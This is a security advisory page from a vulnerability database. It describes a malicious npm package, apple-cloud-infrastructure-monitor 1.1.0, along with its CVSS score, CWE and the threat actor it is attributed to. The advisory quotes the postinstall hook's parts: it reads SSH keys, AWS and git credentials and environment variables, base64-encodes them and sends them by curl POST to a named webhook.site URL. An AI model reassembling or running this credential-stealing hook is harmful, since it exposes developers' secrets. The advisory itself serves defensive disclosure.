VDB
GCVE-110-OSM-2026-3339
GCVE-110-OSM-2026-3339
Advisory PublishedCVSS 8.8/10
Exfiltrates SSH private keys, AWS credentials, git credentials, and all environment variables to an attacker-controlled webhook.site endpoint via HTTP POST in a postinstall hook. Published by the same threat actor (raya4321 / npmtpoc@gmail.com) behind the confirmed apple-internal-config dependency confusion campaign targeting Apple engineers.
**Trigger** (`postinstall`): shell one-liner executes at install time with no user interaction.
**Collection**: reads `~/.ssh/id_rsa`, `~/.aws/credentials`, `~/.git-credentials`, and full environment output (`printenv`).
**Encoding**: combined output is base64-encoded via `| base64`.
**Exfiltration**: piped to `curl -X POST -d @- https://webhook.site/9a376595-d347-4110-ac32-814e6e2f0754`.
**Decoy**: the bundled `index.js` contains only `console.log('Telemetry Service Started...')` with no functional code.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | apple-cloud-infrastructure-monitor | 1.1.0 (affected) | — |
Browse GCVE Records
72,921 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.